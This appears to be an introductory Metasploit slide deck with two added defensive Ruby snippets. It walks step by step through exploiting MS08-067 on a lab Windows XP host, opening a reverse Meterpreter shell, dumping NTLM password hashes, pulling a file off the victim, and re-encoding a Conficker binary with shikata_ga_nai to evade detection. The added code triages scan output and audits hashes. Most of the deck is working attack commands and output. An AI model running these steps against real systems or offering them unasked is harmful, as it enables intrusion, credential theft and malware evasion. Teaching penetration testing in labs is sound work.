
Metasploit 101

By: Metacortex
For:

Audience:
- People who haven't used Metasploit before or don't know what it is
- People looking to maybe learn some new features of Metasploit
- Nubs

What is Metasploit?
Metasploit is an exploitation framework. It is an all-in-one toolkit for everything pentesters, researchers, and exploit developers need.
- Written in Ruby
- Open source
- Highly extensible and customizable
- Originally written by HD Moore
- Maintained by Rapid7 developers

Getting Metasploit
- Best way to get hold of it is to grab it off SVN
- Available pre-installed in BackTrack
- Pre-packaged versions can be downloaded

Linux Prerequisites
To run Metasploit, you need Ruby and Rubygems.

dc@801:~/metasploit$ sudo aptitude install ruby rubygems
The following NEW packages will be installed:
  libruby1.8{a} ruby ruby1.8{a} ruby1.8-dev{a} rubygems rubygems1.8{a}
0 packages upgraded, 6 newly installed, 0 to remove and 0 not upgraded.
Need to get 2,622 kB of archives. After unpacking 11.0 MB will be used.
Do you want to continue? [Y/n/?] y

SVN Download
dc@801:~/metasploit$ svn co https://www.metasploit.com/svn/framework3/trunk/
A trunk/msfelfscan
A trunk/scripts
A trunk/scripts/ps
A trunk/scripts/ps/msflag.ps1
A trunk/scripts/resource
...
A trunk/documentation/rpm
A trunk/documentation/rpm/metasploit.spec
U trunk
Checked out revision 15702.

SVN Update
dc@801:~/metasploit/trunk$ svn update
U external/source/meterpreter/source/extensions/priv/server/priv.c
U external/source/meterpreter/source/extensions/stdapi/server/stdapi.c
U external/source/meterpreter/source/extensions/stdapi/server/net/config/interface.c
...
U HACKING
D documentation/users_guide.pdf
A documentation/Gemfile
A documentation/users_guide_4.2.pdf
A documentation/users_guide_4.3.pdf
Updated to revision 15703.

Download binaries
Do that at
http://www.metasploit.com/download/

What do you get?


dc@801:~/metasploit/trunk$ ls
armitage       HACKING      msfd          msfpescan   plugins        tools
COPYING        lib          msfelfscan    msfrop      README.md
data           modules      msfencode     msfrpc      scripts
documentation  msfbinscan   msfgui        msfrpcd     spec
external       msfcli       msfmachscan   msfupdate   test
Gemfile        msfconsole   msfpayload    msfvenom    THIRDPARTY.md

A whole lot of stuff

msfconsole

But we are really interested in msfconsole

msfconsole
dc@801:~/metasploit/trunk$ sudo ./msfconsole
[sudo] password for dc:

(ASCII-art banner)

       =[ metasploit v4.4.0-release [core:4.4 api:1.0]
+ -- --=[ 922 exploits - 496 auxiliary - 150 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
       =[ svn r15704 updated today (2012.08.04)

msf >

msfconsole help
msf > help

Core Commands
=============

    Command   Description
    -------   -----------
    ?         Help menu
    back      Move back from the current context
    banner    Display an awesome metasploit banner
    cd        Change the current working directory
    color     Toggle color
    connect   Communicate with a host
    exit      Exit the console
    help      Help menu
    info      Displays information about one or more module
    irb       Drop into irb scripting mode
    jobs      Displays and manages jobs
    ...

msfconsole search
msf > search ms08_067

Matching Modules
================

   Name                                 Disclosure Date  Rank   Description
   ----                                 ---------------  ----   -----------
   exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Microsoft Server Service Relative Path Stack Corruption

Nmap
msf > nmap -A 192.168.0.107
[*] exec: nmap -A 192.168.0.107

Starting Nmap 5.21 ( http://nmap.org ) at 2012-08-04 00:51 MDT
Nmap scan report for 192.168.0.107
Host is up (0.00033s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 08:00:27:35:04:D6 (Cadmus Computer Systems)
Device type: general purpose
Running: Microsoft Windows XP
OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003
Network Distance: 1 hop
Service Info: OS: Windows
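A way to triage a scan like the one above for the SMB exposure the following slides go after, added here as an example that is not part of the original deck. The sample scan text is constructed from the slide's output, and parse_nmap and ms08_067_candidates are names chosen for this example.

```ruby
# Constructed sample mirroring the nmap -A output shown on the slide.
NMAP_SAMPLE = <<~NMAP
  Nmap scan report for 192.168.0.107
  Host is up (0.00033s latency).
  Not shown: 997 closed ports
  PORT    STATE SERVICE      VERSION
  135/tcp open  msrpc        Microsoft Windows RPC
  139/tcp open  netbios-ssn
  445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
  MAC Address: 08:00:27:35:04:D6 (Cadmus Computer Systems)
  OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003
NMAP

# Parse nmap "normal" output into one record per "Nmap scan report" block:
# { ip:, ports: [{port:, proto:, state:, service:, version:}], os: }.
def parse_nmap(text)
  hosts = []
  text.each_line do |line|
    if (m = line.match(/^Nmap scan report for (\S+)/))
      hosts << { ip: m[1], ports: [], os: nil }
    elsif hosts.any? && (m = line.match(%r{^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)(?:\s+(.*))?$}))
      hosts.last[:ports] << { port: m[1].to_i, proto: m[2], state: m[3],
                              service: m[4], version: m[5].to_s.strip }
    elsif hosts.any? && (m = line.match(/^OS details: (.*)$/))
      hosts.last[:os] = m[1].strip
    end
  end
  hosts
end

# Windows generations that MS08-067 applied to. This is matched on the OS
# fingerprint guess, so treat the result as a patch-priority list, not proof.
LEGACY_WINDOWS = /Windows (XP|2000|Server 2003)/

# Hosts with 445/tcp open and a legacy-Windows fingerprint.
def ms08_067_candidates(hosts)
  hosts.select do |h|
    smb_open = h[:ports].any? { |p| p[:port] == 445 && p[:proto] == 'tcp' && p[:state] == 'open' }
    smb_open && h[:os].to_s.match?(LEGACY_WINDOWS)
  end.map { |h| h[:ip] }
end
```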

Exploits and Payloads


Exploit: Code that leverages a certain vulnerability
Payload: Code that gets placed on the system post exploitation

Selecting an Exploit
Once you have identified a vulnerability that has an exploit in Metasploit, let's go ahead and use it.
In this example, we are going against a fresh install of Windows XP SP2.
XP SP2 is notorious for MS08-067 (the bug Conficker used).
MS08-067 is a super reliable exploit, so we will use it.

Exploit Options
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

Available Payloads
msf exploit(ms08_067_netapi) > show payloads

Compatible Payloads
===================

   Name                                    Disclosure Date  Rank    Description
   ----                                    ---------------  ----    -----------
   generic/custom                                           normal  Custom Payload
   generic/debug_trap                                       normal  Generic x86 Debug Trap
   generic/shell_bind_tcp
   ...
   ...                                                              Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   windows/vncinject/reverse_tcp                            normal  VNC Server (Reflective Injection), Reverse TCP Stager
   windows/vncinject/reverse_tcp_allports                   normal  VNC Server (Reflective Injection), Reverse All-Port TCP Stager

Select Payload
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp

Show Exploit Options


msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: process, none, seh, thread
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

Set Exploit Options


msf exploit(ms08_067_netapi) > set RHOST 192.168.0.107
RHOST => 192.168.0.107
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.101
LHOST => 192.168.0.101
msf exploit(ms08_067_netapi) > show options

Verify Options
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.0.107    yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: process, none, seh, thread
   LHOST     192.168.0.101    yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

EXPLOIT!
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.0.101:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.0.107
[*] Meterpreter session 1 opened (192.168.0.101:4444 -> 192.168.0.107:1041) at Sat Aug 04 00:43:16 -0600 2012
meterpreter >

Basic Meterpreter
meterpreter > ifconfig

Interface 1
============
Name         : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU          : 1520
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0

Interface 2
============
Name         : AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC : 08:00:27:35:04:d6
MTU          : 1500
IPv4 Address : 192.168.0.107
IPv4 Netmask : 255.255.255.0

Basic Meterpreter
meterpreter > hashdump
Administrator:500:52b7bd1c19ac445baad3b435b51404ee:d04b083dd7cbadb1f6abbca2d64222a5:::
dc801-1:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:acdfc6045fe025a3618e54ed631edee9:919ec17846e9c0392ff21e5f93eb60d4:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:2a19baf0800172a7622217c273064e3a:::
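The hashdump format above (user:RID:LM:NT:::) carries two facts a defender auditing a host should check: the well-known empty-LM and empty-NT constants reveal accounts with blank passwords and accounts for which the box still stores LM hashes. This is an added example, not part of the deck; the input is the slide's own output, and parse_hashdump and audit are names chosen here.

```ruby
# LM hash of an empty password and NT hash of an empty string (well-known constants).
EMPTY_LM = 'aad3b435b51404eeaad3b435b51404ee'
EMPTY_NT = '31d6cfe0d16ae931b73c59d7e0c089c0'

# The hashdump lines shown on the slide.
HASHDUMP = <<~DUMP
  Administrator:500:52b7bd1c19ac445baad3b435b51404ee:d04b083dd7cbadb1f6abbca2d64222a5:::
  dc801-1:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  HelpAssistant:1000:acdfc6045fe025a3618e54ed631edee9:919ec17846e9c0392ff21e5f93eb60d4:::
  SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:2a19baf0800172a7622217c273064e3a:::
DUMP

Account = Struct.new(:user, :rid, :lm, :nt)

# Parse pwdump-style lines; malformed or blank lines are skipped.
def parse_hashdump(text)
  text.each_line.each_with_object([]) do |line, accounts|
    user, rid, lm, nt = line.strip.split(':', 5)
    next unless lm && nt && lm.match?(/\A\h{32}\z/) && nt.match?(/\A\h{32}\z/)
    accounts << Account.new(user, rid.to_i, lm.downcase, nt.downcase)
  end
end

# Returns { finding => [usernames] }.
# - blank_password: NT hash is the empty-string hash.
# - lm_hash_stored: LM hash is present (NoLMHash policy not in effect).
# - short_password: LM second half equals the empty half, so LM only covers
#   the first 7 characters, i.e. the password is at most 7 characters long.
def audit(accounts)
  findings = Hash.new { |h, k| h[k] = [] }
  accounts.each do |a|
    findings[:blank_password] << a.user if a.nt == EMPTY_NT
    next if a.lm == EMPTY_LM
    findings[:lm_hash_stored] << a.user
    findings[:short_password] << a.user if a.lm[16, 16] == EMPTY_LM[16, 16]
  end
  findings
end
```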

Basic Meterpreter
meterpreter > search -f *credit*
Found 2 results...
c:\\Documents and Settings\dc801-1\Desktop\CreditCardData.txt (16 bytes)
c:\\Documents and Settings\dc801-1\Recent\CreditCardData.lnk (519 bytes)
meterpreter > cd C:\\
meterpreter > cd Documents\ and\ Settings
meterpreter > cd dc801-1
meterpreter > cd Desktop
meterpreter > ls

Listing: C:\Documents and Settings\dc801-1\Desktop
==================================================

Mode              Size  Type  Last modified                   Name
----              ----  ----  -------------                   ----
40777/rwxrwxrwx   0     dir   Sun Aug 05 13:07:32 -0600 2012  .
40777/rwxrwxrwx   0     dir   Sat Aug 04 00:18:30 -0600 2012  ..
100666/rw-rw-rw-  16    fil   Sun Aug 05 13:08:20 -0600 2012  CreditCardData.txt
meterpreter > download CreditCardData.txt
[*] downloading: CreditCardData.txt -> CreditCardData.txt
[*] downloaded : CreditCardData.txt -> CreditCardData.txt

Basic Meterpreter
dc@801:~/metasploit/trunk$ ls
armitage            HACKING     msfelfscan   msfrpc     spec
COPYING             lib         msfencode    msfrpcd    test
CreditCardData.txt  modules     msfgui       msfupdate  THIRD-PARTY.md
data                msfbinscan  msfmachscan  msfvenom   tools
documentation       msfcli      msfpayload   plugins
external            msfconsole  msfpescan    README.md
Gemfile             msfd        msfrop       scripts
dc@801:~/metasploit/trunk$ cat CreditCardData.txt
not really. lulz
dc@801:~/metasploit/trunk$

MSFEncode

dc@801:~/metasploit/trunk$ ./msfencode -i conficker.EXE -o notconficker.exe -e x86/shikata_ga_nai -c 10
[*] x86/shikata_ga_nai succeeded with size 86045 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 86074 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 86103 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 86132 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 86161 (iteration=5)
[*] x86/shikata_ga_nai succeeded with size 86190 (iteration=6)
[*] x86/shikata_ga_nai succeeded with size 86219 (iteration=7)
[*] x86/shikata_ga_nai succeeded with size 86248 (iteration=8)
[*] x86/shikata_ga_nai succeeded with size 86277 (iteration=9)
[*] x86/shikata_ga_nai succeeded with size 86306 (iteration=10)

MSFEncode file size jump


dc@801:~/metasploit/trunk$ ls -alh *conficker*
-rw-r--r-- 1 dc dc 84K 2012-08-29 13:23 conficker.EXE
-rw-r--r-- 1 dc dc 368K 2012-08-29 13:30 notconficker.exe
